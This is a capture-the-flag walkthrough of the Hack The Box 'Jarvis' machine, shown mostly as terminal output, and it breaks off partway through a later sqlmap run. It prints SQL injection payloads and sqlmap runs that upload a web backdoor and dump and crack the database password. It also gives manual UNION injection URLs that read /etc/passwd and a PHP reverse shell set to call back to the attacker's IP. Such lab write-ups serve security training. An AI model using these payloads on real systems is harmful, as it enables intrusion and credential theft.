Jarvis (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.143
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 01:23 GMT
Nmap scan report for 10.10.10.143
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
| 256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_ 256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=11/10%OT=22%CT=1%CU=34518%PV=Y%DS=2%DC=T%G=Y%TM=5DC766
OS:D1%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=8)OP
OS:S(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST
OS:11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)EC
OS:N(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 220.51 ms 10.10.14.1
2 220.57 ms 10.10.10.143

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.50 seconds

now on browser

http://10.10.10.143/

now on terminal

root@kali:~/Downloads# dirb http://10.10.10.143

—————–
DIRB v2.22
By The Dark Raver
—————–

START_TIME: Sun Nov 10 01:26:39 2019
URL_BASE: http://10.10.10.143/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

—————–

GENERATED WORDS: 4612

—- Scanning URL: http://10.10.10.143/ —-
==> DIRECTORY: http://10.10.10.143/css/
==> DIRECTORY: http://10.10.10.143/fonts/
==> DIRECTORY: http://10.10.10.143/images/
+ http://10.10.10.143/index.php (CODE:200|SIZE:23628)
==> DIRECTORY: http://10.10.10.143/js/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/
+ http://10.10.10.143/server-status (CODE:403|SIZE:300)

—- Entering directory: http://10.10.10.143/css/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—- Entering directory: http://10.10.10.143/fonts/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—- Entering directory: http://10.10.10.143/images/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—- Entering directory: http://10.10.10.143/js/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—- Entering directory: http://10.10.10.143/phpmyadmin/ —-
+ http://10.10.10.143/phpmyadmin/ChangeLog (CODE:200|SIZE:19186)
==> DIRECTORY: http://10.10.10.143/phpmyadmin/doc/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/examples/
+ http://10.10.10.143/phpmyadmin/favicon.ico (CODE:200|SIZE:22486)
+ http://10.10.10.143/phpmyadmin/index.php (CODE:200|SIZE:15223)
==> DIRECTORY: http://10.10.10.143/phpmyadmin/js/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/libraries/
+ http://10.10.10.143/phpmyadmin/LICENSE (CODE:200|SIZE:18092)
==> DIRECTORY: http://10.10.10.143/phpmyadmin/locale/
+ http://10.10.10.143/phpmyadmin/phpinfo.php (CODE:200|SIZE:15215)
+ http://10.10.10.143/phpmyadmin/README (CODE:200|SIZE:1520)
+ http://10.10.10.143/phpmyadmin/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://10.10.10.143/phpmyadmin/setup/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/sql/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/templates/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/themes/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/tmp/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/vendor/

—- Entering directory: http://10.10.10.143/phpmyadmin/doc/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—- Entering directory: http://10.10.10.143/phpmyadmin/examples/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—- Entering directory: http://10.10.10.143/phpmyadmin/js/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—- Entering directory: http://10.10.10.143/phpmyadmin/libraries/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—- Entering directory: http://10.10.10.143/phpmyadmin/locale/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—- Entering directory: http://10.10.10.143/phpmyadmin/setup/ —-

(!) FATAL: Too many errors connecting to host
(Possible cause: OPERATION TIMEOUT)

—————–
END_TIME: Sun Nov 10 03:22:22 2019
DOWNLOADED: 10379 – FOUND: 9

now open the source code

view-source:http://10.10.10.143/

we are getting this

Superior Family Room

now try this

http://10.10.10.143/room.php?cod=3%27

So this website might be vulnerable to SQL injection.To test this, we use SQLMAP and get information about databases, tables, columns.

Run the reverse shell with SQLMAP using the following command:

root@kali:~/Downloads# sqlmap -u http://10.10.10.143/room.php?cod=1
___
__H__
___ ___[,]_____ ___ ___ {1.3.10#stable}
|_ -| . [‘] | .’| . |
|___|_ [‘]_|_|_|__,| _|
|_|V… |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:00:18 /2019-11-10/

[05:00:19] [INFO] testing connection to the target URL
[05:00:19] [INFO] checking if the target is protected by some kind of WAF/IPS
[05:00:20] [INFO] testing if the target URL content is stable
[05:00:20] [INFO] target URL content is stable
[05:00:20] [INFO] testing if GET parameter ‘cod’ is dynamic
[05:00:20] [INFO] GET parameter ‘cod’ appears to be dynamic
[05:00:21] [INFO] heuristic (basic) test shows that GET parameter ‘cod’ might be injectable
[05:00:21] [INFO] testing for SQL injection on GET parameter ‘cod’
[05:00:21] [INFO] testing ‘AND boolean-based blind – WHERE or HAVING clause’
[05:00:22] [INFO] GET parameter ‘cod’ appears to be ‘AND boolean-based blind – WHERE or HAVING clause’ injectable (with –string=”of”)
[05:00:26] [INFO] heuristic (extended) test shows that the back-end DBMS could be ‘MySQL’
it looks like the back-end DBMS is ‘MySQL’. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for ‘MySQL’ extending provided level (1) and risk (1) values? [Y/n] y
[05:00:30] [INFO] testing ‘MySQL >= 5.5 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)’
[05:00:31] [INFO] testing ‘MySQL >= 5.5 OR error-based – WHERE or HAVING clause (BIGINT UNSIGNED)’
[05:00:31] [INFO] testing ‘MySQL >= 5.5 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)’
[05:00:31] [INFO] testing ‘MySQL >= 5.5 OR error-based – WHERE or HAVING clause (EXP)’
[05:00:31] [INFO] testing ‘MySQL >= 5.7.8 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)’
[05:00:32] [INFO] testing ‘MySQL >= 5.7.8 OR error-based – WHERE or HAVING clause (JSON_KEYS)’
[05:00:32] [INFO] testing ‘MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’
[05:00:32] [INFO] testing ‘MySQL >= 5.0 OR error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’
[05:00:32] [INFO] testing ‘MySQL >= 5.1 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)’
[05:00:33] [INFO] testing ‘MySQL >= 5.1 OR error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)’
[05:00:33] [INFO] testing ‘MySQL >= 5.1 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)’
[05:00:33] [INFO] testing ‘MySQL >= 5.1 OR error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)’
[05:00:33] [INFO] testing ‘MySQL >= 4.1 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’
[05:00:34] [INFO] testing ‘MySQL >= 4.1 OR error-based – WHERE or HAVING clause (FLOOR)’
[05:00:34] [INFO] testing ‘MySQL OR error-based – WHERE or HAVING clause (FLOOR)’
[05:00:35] [INFO] testing ‘MySQL >= 5.1 error-based – PROCEDURE ANALYSE (EXTRACTVALUE)’
[05:00:35] [INFO] testing ‘MySQL >= 5.5 error-based – Parameter replace (BIGINT UNSIGNED)’
[05:00:35] [INFO] testing ‘MySQL >= 5.5 error-based – Parameter replace (EXP)’
[05:00:35] [INFO] testing ‘MySQL >= 5.7.8 error-based – Parameter replace (JSON_KEYS)’
[05:00:36] [INFO] testing ‘MySQL >= 5.0 error-based – Parameter replace (FLOOR)’
[05:00:36] [INFO] testing ‘MySQL >= 5.1 error-based – Parameter replace (UPDATEXML)’
[05:00:36] [INFO] testing ‘MySQL >= 5.1 error-based – Parameter replace (EXTRACTVALUE)’
[05:00:36] [INFO] testing ‘MySQL inline queries’
[05:00:37] [INFO] testing ‘MySQL > 5.0.11 stacked queries (comment)’
[05:00:37] [INFO] testing ‘MySQL > 5.0.11 stacked queries’
[05:00:37] [INFO] testing ‘MySQL > 5.0.11 stacked queries (query SLEEP – comment)’
[05:00:38] [INFO] testing ‘MySQL > 5.0.11 stacked queries (query SLEEP)’
[05:00:38] [INFO] testing ‘MySQL < 5.0.12 stacked queries (heavy query – comment)’ [05:00:38] [INFO] testing ‘MySQL < 5.0.12 stacked queries (heavy query)’ [05:00:39] [INFO] testing ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’
[05:00:49] [INFO] GET parameter ‘cod’ appears to be ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’ injectable
[05:00:49] [INFO] testing ‘Generic UNION query (NULL) – 1 to 20 columns’
[05:00:49] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[05:00:50] [INFO] ‘ORDER BY’ technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[05:00:51] [INFO] target URL appears to have 7 columns in query
[05:00:56] [INFO] GET parameter ‘cod’ is ‘Generic UNION query (NULL) – 1 to 20 columns’ injectable
GET parameter ‘cod’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:

Parameter: cod (GET)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: cod=1 AND 9798=9798

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cod=1 AND (SELECT 5908 FROM (SELECT(SLEEP(5)))ROhK)

Type: UNION query
Title: Generic UNION query (NULL) – 7 columns
Payload: cod=-7912 UNION ALL SELECT NULL,NULL,CONCAT(0x7162716a71,0x716953596742754675626445567968597243474972654775745258747a77774f65596862794c504e,0x71706a6b71),NULL,NULL,NULL,NULL– jhLu

[05:00:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: PHP, Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[05:00:59] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/10.10.10.143’

[*] ending @ 05:00:59 /2019-11-10/

root@kali:~/Downloads# sqlmap -u http://jarvis.htb/room.php?cod=1 –user-agent “Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0”
___
__H__
___ ___[.]_____ ___ ___ {1.3.10#stable}
|_ -| . [,] | .’| . |
|___|_ [‘]_|_|_|__,| _|
|_|V… |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:02:13 /2019-11-10/

[05:02:13] [INFO] testing connection to the target URL
[05:02:13] [INFO] checking if the target is protected by some kind of WAF/IPS
[05:02:14] [INFO] testing if the target URL content is stable
[05:02:14] [INFO] target URL content is stable
[05:02:14] [INFO] testing if GET parameter ‘cod’ is dynamic
[05:02:14] [INFO] GET parameter ‘cod’ appears to be dynamic
[05:02:15] [INFO] heuristic (basic) test shows that GET parameter ‘cod’ might be injectable
[05:02:15] [INFO] testing for SQL injection on GET parameter ‘cod’
[05:02:15] [INFO] testing ‘AND boolean-based blind – WHERE or HAVING clause’
[05:02:17] [INFO] GET parameter ‘cod’ appears to be ‘AND boolean-based blind – WHERE or HAVING clause’ injectable (with –string=”of”)
[05:02:21] [INFO] heuristic (extended) test shows that the back-end DBMS could be ‘MySQL’
it looks like the back-end DBMS is ‘MySQL’. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for ‘MySQL’ extending provided level (1) and risk (1) values? [Y/n] y
[05:02:38] [INFO] testing ‘MySQL >= 5.5 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)’
[05:02:38] [INFO] testing ‘MySQL >= 5.5 OR error-based – WHERE or HAVING clause (BIGINT UNSIGNED)’
[05:02:39] [INFO] testing ‘MySQL >= 5.5 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)’
[05:02:39] [INFO] testing ‘MySQL >= 5.5 OR error-based – WHERE or HAVING clause (EXP)’
[05:02:40] [INFO] testing ‘MySQL >= 5.7.8 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)’
[05:02:40] [INFO] testing ‘MySQL >= 5.7.8 OR error-based – WHERE or HAVING clause (JSON_KEYS)’
[05:02:40] [INFO] testing ‘MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’
[05:02:40] [INFO] testing ‘MySQL >= 5.0 OR error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’
[05:02:41] [INFO] testing ‘MySQL >= 5.1 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)’
[05:02:41] [INFO] testing ‘MySQL >= 5.1 OR error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)’
[05:02:41] [INFO] testing ‘MySQL >= 5.1 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)’
[05:02:42] [INFO] testing ‘MySQL >= 5.1 OR error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)’
[05:02:42] [INFO] testing ‘MySQL >= 4.1 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’
[05:02:42] [INFO] testing ‘MySQL >= 4.1 OR error-based – WHERE or HAVING clause (FLOOR)’
[05:02:43] [INFO] testing ‘MySQL OR error-based – WHERE or HAVING clause (FLOOR)’
[05:02:43] [INFO] testing ‘MySQL >= 5.1 error-based – PROCEDURE ANALYSE (EXTRACTVALUE)’
[05:02:43] [INFO] testing ‘MySQL >= 5.5 error-based – Parameter replace (BIGINT UNSIGNED)’
[05:02:44] [INFO] testing ‘MySQL >= 5.5 error-based – Parameter replace (EXP)’
[05:02:44] [INFO] testing ‘MySQL >= 5.7.8 error-based – Parameter replace (JSON_KEYS)’
[05:02:44] [INFO] testing ‘MySQL >= 5.0 error-based – Parameter replace (FLOOR)’
[05:02:45] [INFO] testing ‘MySQL >= 5.1 error-based – Parameter replace (UPDATEXML)’
[05:02:45] [INFO] testing ‘MySQL >= 5.1 error-based – Parameter replace (EXTRACTVALUE)’
[05:02:45] [INFO] testing ‘MySQL inline queries’
[05:02:46] [INFO] testing ‘MySQL > 5.0.11 stacked queries (comment)’
[05:02:46] [INFO] testing ‘MySQL > 5.0.11 stacked queries’
[05:02:46] [INFO] testing ‘MySQL > 5.0.11 stacked queries (query SLEEP – comment)’
[05:02:46] [INFO] testing ‘MySQL > 5.0.11 stacked queries (query SLEEP)’
[05:02:47] [INFO] testing ‘MySQL < 5.0.12 stacked queries (heavy query – comment)’ [05:02:47] [INFO] testing ‘MySQL < 5.0.12 stacked queries (heavy query)’ [05:02:47] [INFO] testing ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’
[05:02:58] [INFO] GET parameter ‘cod’ appears to be ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’ injectable
[05:02:58] [INFO] testing ‘Generic UNION query (NULL) – 1 to 20 columns’
[05:02:58] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[05:03:05] [INFO] target URL appears to be UNION injectable with 7 columns
[05:03:10] [INFO] GET parameter ‘cod’ is ‘Generic UNION query (NULL) – 1 to 20 columns’ injectable
GET parameter ‘cod’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 88 HTTP(s) requests:

Parameter: cod (GET)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: cod=1 AND 3446=3446

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cod=1 AND (SELECT 9336 FROM (SELECT(SLEEP(5)))WTdc)

Type: UNION query
Title: Generic UNION query (NULL) – 7 columns
Payload: cod=-4903 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162627071,0x446f6768536372567059476e43545a69567973585a587566704f4e4c72494d764f46786d5850527a,0x71707a7671),NULL,NULL,NULL– CEiS

[05:03:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: PHP, Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[05:03:14] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/jarvis.htb’

[*] ending @ 05:03:14 /2019-11-10/

root@kali:~/Downloads# sqlmap -u http://jarvis.htb/room.php?cod=1 –user-agent “Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0” –os-shell
___
__H__
___ ___[“]_____ ___ ___ {1.3.10#stable}
|_ -| . [‘] | .’| . |
|___|_ [.]_|_|_|__,| _|
|_|V… |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:03:51 /2019-11-10/

[05:03:51] [INFO] resuming back-end DBMS ‘mysql’
[05:03:51] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: cod (GET)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: cod=1 AND 3446=3446

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cod=1 AND (SELECT 9336 FROM (SELECT(SLEEP(5)))WTdc)

Type: UNION query
Title: Generic UNION query (NULL) – 7 columns
Payload: cod=-4903 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162627071,0x446f6768536372567059476e43545a69567973585a587566704f4e4c72494d764f46786d5850527a,0x71707a7671),NULL,NULL,NULL– CEiS

[05:03:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: PHP, Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[05:03:51] [INFO] going to use a web backdoor for command prompt
[05:03:51] [INFO] fingerprinting the back-end DBMS operating system
[05:03:52] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[05:04:07] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) (‘/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs’) (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: /var/www/html
[05:04:18] [INFO] retrieved web server absolute paths: ‘/images/’
[05:04:18] [INFO] trying to upload the file stager on ‘/var/www/html/’ via LIMIT ‘LINES TERMINATED BY’ method
[05:04:20] [INFO] the file stager has been successfully uploaded on ‘/var/www/html/’ – http://jarvis.htb:80/tmpuumez.php
[05:04:20] [INFO] the backdoor has been successfully uploaded on ‘/var/www/html/’ – http://jarvis.htb:80/tmpbviua.php
[05:04:20] [INFO] calling OS shell. To quit type ‘x’ or ‘q’ and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: ‘www-data’
os-shell> id
do you want to retrieve the command standard output? [Y/n/a] a
command standard output: ‘uid=33(www-data) gid=33(www-data) groups=33(www-data)’
os-shell>

root@kali:~/Downloads# sqlmap -u http://jarvis.htb/room.php?cod=1 –user-agent “Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0” –passwords
___
__H__
___ ___[(]_____ ___ ___ {1.3.10#stable}
|_ -| . [,] | .’| . |
|___|_ [.]_|_|_|__,| _|
|_|V… |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:05:47 /2019-11-10/

[05:05:47] [INFO] resuming back-end DBMS ‘mysql’
[05:05:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: cod (GET)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: cod=1 AND 3446=3446

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cod=1 AND (SELECT 9336 FROM (SELECT(SLEEP(5)))WTdc)

Type: UNION query
Title: Generic UNION query (NULL) – 7 columns
Payload: cod=-4903 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162627071,0x446f6768536372567059476e43545a69567973585a587566704f4e4c72494d764f46786d5850527a,0x71707a7671),NULL,NULL,NULL– CEiS

[05:05:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: PHP, Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[05:05:48] [INFO] fetching database users password hashes
[05:05:48] [INFO] used SQL query returns 1 entry
[05:05:48] [INFO] used SQL query returns 1 entry
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[05:05:51] [INFO] writing hashes to a temporary file ‘/tmp/sqlmapHt2GQo3116/sqlmaphashes-ZuMIcK.txt’
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
[05:05:53] [INFO] using hash method ‘mysql_passwd’
what dictionary do you want to use?
[1] default dictionary file ‘/usr/share/sqlmap/data/txt/wordlist.tx_’ (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[05:06:34] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[05:06:39] [INFO] starting dictionary-based cracking (mysql_passwd)
[05:06:39] [INFO] starting 4 processes
[05:06:42] [INFO] cracked password ‘imissyou’ for user ‘DBadmin’
database management system users password hashes:
[*] DBadmin [1]:
password hash: *2D2B7A5E4E637B8FBA1D17F40318F277D29964D0
clear-text password: imissyou

[05:06:47] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/jarvis.htb’

[*] ending @ 05:06:47 /2019-11-10/

now on browser

https://crackstation.net/

2D2B7A5E4E637B8FBA1D17F40318F277D29964D0 MySQL4.1+ imissyou

this above hash we can get by single line browser

http://10.10.10.143/room.php?cod=1%20AND%201=2%20UNION%20SELECT%201,2,3,group_concat(user,0x3a,password),5,6,7%20from%20mysql.user#

we get by this

$ 3 / per night

DBadmin:*2D2B7A5E4E637B8FBA1D17F40318F277D29964D0

now try

http://10.10.10.143/room.php?cod=1%20AND%201=2%20UNION%20ALL%20SELECT%201,2,3,LOAD_FILE(%27/etc/passwd%27),5,6,7%20#

and we get

$ 3 / per night

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false _apt:x:104:65534::/nonexistent:/bin/false messagebus:x:105:110::/var/run/dbus:/bin/false pepper:x:1000:1000:,,,:/home/pepper:/bin/bash mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false sshd:x:107:65534::/run/sshd:/usr/sbin/nologin oscp987://ylENbU061xPB.UxzDd0:0:0:/root:/bin/bash oscp876:$1$oscp876$j//ylENbU061xPB.UxzDd0:0:0:/root:/bin/bash

now proceed further

Then I tried these credentials (DBadmin : imissyou) with phpmyadmin and I got in:

http://10.10.10.143/phpmyadmin/index.php

username : DBadmin
password : imissyou

and we are in

now on terminal

root@kali:~/Downloads# cp /root/Downloads/SecLists/Web-Shells/laudanum-0.8/php/php-reverse-shell.php shell2.php

root@kali:~/Downloads# gedit shell2.php

$ip = ‘10.10.15.149’; // CHANGE THIS
$port = 8888; // CHANGE THIS

save it

root@kali:~/Downloads# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 …

root@kali:~/Downloads# sqlmap -u http://10.10.10.143/room.php?cod=3 –banner –batch -D hottel –os-shell
___
__H__
___ ___[(]_____ ___ ___ {1.3.10#stable}
|_ -| . [.] | .’| . |
|___|_ [‘]_|_|_|__,| _|
|_|V… |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:21:16 /2019-11-10/

[05:21:16] [INFO] resuming back-end DBMS ‘mysql’
[05:21:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: cod (GET)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: cod=1 AND 9798=9798

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cod=1 AND (SELECT 5908 FROM (SELECT(SLEEP(5)))ROhK)

Type: UNION query
Title: Generic UNION query (NULL) – 7 columns
Payload: cod=-7912 UNION ALL SELECT NULL,NULL,CONCAT(0x7162716a71,0x716953596742754675626445567968597243474972654775745258747a77774f65596862794c504e,0x71706a6b71),NULL,NULL,NULL,NULL– jhLu

[05:21:17] [INFO] the back-end DBMS is MySQL
[05:21:17] [INFO] fetching banner
web server operating system: Linux Debian 9.0 (stretch)
web application technology: PHP, Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
banner: ‘10.1.37-MariaDB-0+deb9u1’
[05:21:17] [INFO] going to use a web backdoor for command prompt
[05:21:17] [INFO] fingerprinting the back-end DBMS operating system
[05:21:18] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
